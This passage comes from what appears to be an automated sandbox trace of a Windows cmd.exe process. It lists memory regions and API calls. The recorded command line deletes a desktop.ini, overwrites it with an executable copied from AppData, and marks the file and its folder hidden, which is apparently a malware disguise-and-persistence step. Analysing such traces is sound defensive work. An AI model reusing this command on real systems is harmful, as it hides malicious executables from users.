"c:\\windows\\system32\\gdi32.dll") Region: id = 13335 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13336 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 13337 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13338 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13339 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 13340 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13341 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 13342 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 13343 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 13344 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 13345 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 13346 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = 
"sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 186 os_tid = 0xafc [0134.360] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfa44 | out: lpSystemTimeAsFileTime=0x1cfa44*(dwLowDateTime=0x8a055920, dwHighDateTime=0x1d440a9)) [0134.360] GetCurrentProcessId () returned 0xc10 [0134.360] GetCurrentThreadId () returned 0xafc [0134.360] GetTickCount () returned 0x2a9c5 [0134.360] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfa3c | out: lpPerformanceCount=0x1cfa3c*=19114945404) returned 1 [0134.361] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0134.361] __set_app_type (_Type=0x1) [0134.361] __p__fmode () returned 0x76b331f4 [0134.361] __p__commode () returned 0x76b331fc [0134.361] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0134.361] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0134.361] GetCurrentThreadId () returned 0xafc [0134.361] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xafc) returned 0x38 [0134.362] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.362] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0134.362] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.362] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.362] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf9d4 | out: phkResult=0x1cf9d4*=0x0) returned 0x2 [0134.362] VirtualQuery (in: lpAddress=0x1cfa0b, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.362] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0134.362] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.362] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.362] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0134.362] GetConsoleOutputCP () returned 0x1b5 [0134.362] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.362] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0134.362] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.362] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0134.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.363] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.363] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.363] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.363] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.363] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.363] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) 
returned 1 [0134.363] GetEnvironmentStringsW () returned 0x2104d8* [0134.364] FreeEnvironmentStringsW (penv=0x2104d8) returned 1 [0134.364] GetEnvironmentStringsW () returned 0x2104d8* [0134.364] FreeEnvironmentStringsW (penv=0x2104d8) returned 1 [0134.364] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce944 | out: phkResult=0x1ce944*=0x40) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x88, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x1, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x1, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x0, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x40, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x40, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce94c, 
lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x40, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.364] RegCloseKey (hKey=0x40) returned 0x0 [0134.364] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce944 | out: phkResult=0x1ce944*=0x40) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x40, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x1, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x1, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.365] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x0, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.365] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x9, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.365] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x9, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.365] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, 
lpData=0x1ce950*=0x9, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.365] RegCloseKey (hKey=0x40) returned 0x0 [0134.365] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886368 [0134.365] srand (_Seed=0x5b886368) [0134.365] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"" [0134.365] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"" [0134.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.365] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x211c38, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0134.365] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.366] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.366] GetEnvironmentVariableW (in: 
lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.366] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.366] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.366] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.366] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.366] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.366] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.366] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.366] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.366] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.366] GetEnvironmentStringsW () returned 0x212628* [0134.366] FreeEnvironmentStringsW (penv=0x212628) returned 1 [0134.366] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.366] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.366] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.366] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.366] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.366] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.366] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.366] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0134.366] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.366] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.366] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf710 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.367] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf710, lpFilePart=0x1cf70c | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf70c*="Desktop") returned 0x18 [0134.367] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.367] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf48c | out: lpFindFileData=0x1cf48c) returned 0x210cb8 [0134.367] FindClose (in: hFindFile=0x210cb8 | out: hFindFile=0x210cb8) returned 1 [0134.367] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf48c | out: lpFindFileData=0x1cf48c) returned 0x210cb8 [0134.367] FindClose (in: hFindFile=0x210cb8 | out: hFindFile=0x210cb8) returned 1 [0134.367] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf48c | out: lpFindFileData=0x1cf48c) returned 0x210cb8 [0134.367] FindClose (in: hFindFile=0x210cb8 | out: hFindFile=0x210cb8) returned 1 [0134.367] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.367] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0134.367] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0134.368] GetEnvironmentStringsW () returned 0x2104d8* [0134.368] FreeEnvironmentStringsW (penv=0x2104d8) returned 1 [0134.368] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.368] GetConsoleOutputCP () returned 0x1b5 [0134.368] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.368] GetUserDefaultLCID () returned 0x409 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf850, cchData=128 | out: lpLCData="0") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, 
lpLCData=0x1cf850, cchData=128 | out: lpLCData="0") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf850, cchData=128 | out: lpLCData="1") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0134.369] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.371] GetConsoleTitleW (in: lpConsoleTitle=0x200af0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.371] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.371] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0134.371] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0134.371] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") 
returned 0x76962732 [0134.372] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0134.372] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0134.372] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0134.372] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0134.372] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0134.372] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0134.372] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0134.375] _wcsicmp (_String1="del", _String2=")") returned 59 [0134.375] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0134.375] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0134.375] _wcsicmp (_String1="IF", _String2="del") returned 5 [0134.375] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0134.375] _wcsicmp (_String1="REM", _String2="del") returned 14 [0134.375] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0134.377] _wcsicmp (_String1="type", _String2=")") returned 75 [0134.377] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0134.377] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0134.377] _wcsicmp (_String1="IF", _String2="type") returned -11 [0134.377] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0134.377] _wcsicmp (_String1="REM", _String2="type") returned -2 [0134.377] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0134.430] SetErrorMode (uMode=0x0) returned 0x0 [0134.430] SetErrorMode (uMode=0x1) returned 0x0 [0134.430] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2104e0, lpFilePart=0x1cf004 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf004*="Desktop") returned 0x18 [0134.430] SetErrorMode (uMode=0x0) returned 0x1 [0134.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 
[0134.430] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.434] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.435] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0xffffffff [0134.435] GetLastError () returned 0x2 [0134.435] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0xffffffff [0134.435] GetLastError () returned 0x2 [0134.435] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0x2125c8 [0134.436] FindClose (in: hFindFile=0x2125c8 | out: hFindFile=0x2125c8) returned 1 [0134.436] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0xffffffff [0134.436] GetLastError () returned 0x2 [0134.436] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0x2125c8 [0134.436] FindClose (in: hFindFile=0x2125c8 | out: hFindFile=0x2125c8) returned 1 [0134.436] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.436] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.436] GetConsoleTitleW (in: lpConsoleTitle=0x1cf278, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.436] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf100, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf1c8 | out: lpAttributeList=0x1cf100, lpSize=0x1cf1c8) returned 1 [0134.436] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf100, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf1c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf100, lpPreviousValue=0x0) returned 1 [0134.436] GetStartupInfoW (in: lpStartupInfo=0x1cf0bc | out: lpStartupInfo=0x1cf0bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0134.436] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.437] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf15c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf1a8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", lpProcessInformation=0x1cf1a8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc64, dwThreadId=0xc20)) returned 1 [0134.445] CloseHandle (hObject=0x4c) returned 1 [0134.445] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 
[0134.446] GetEnvironmentStringsW () returned 0x210a08* [0134.446] FreeEnvironmentStringsW (penv=0x210a08) returned 1 [0134.446] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0134.528] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf09c | out: lpExitCode=0x1cf09c*=0x0) returned 1 [0134.528] CloseHandle (hObject=0x50) returned 1 [0134.528] _vsnwprintf (in: _Buffer=0x1cf1e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf0a8 | out: _Buffer="00000000") returned 8 [0134.528] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0134.528] GetEnvironmentStringsW () returned 0x212618* [0134.528] FreeEnvironmentStringsW (penv=0x212618) returned 1 [0134.528] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.528] GetEnvironmentStringsW () returned 0x212618* [0134.528] FreeEnvironmentStringsW (penv=0x212618) returned 1 [0134.528] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf100 | out: lpAttributeList=0x1cf100) [0134.528] GetConsoleTitleW (in: lpConsoleTitle=0x1cf480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.529] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce4f8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ce4fc, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, 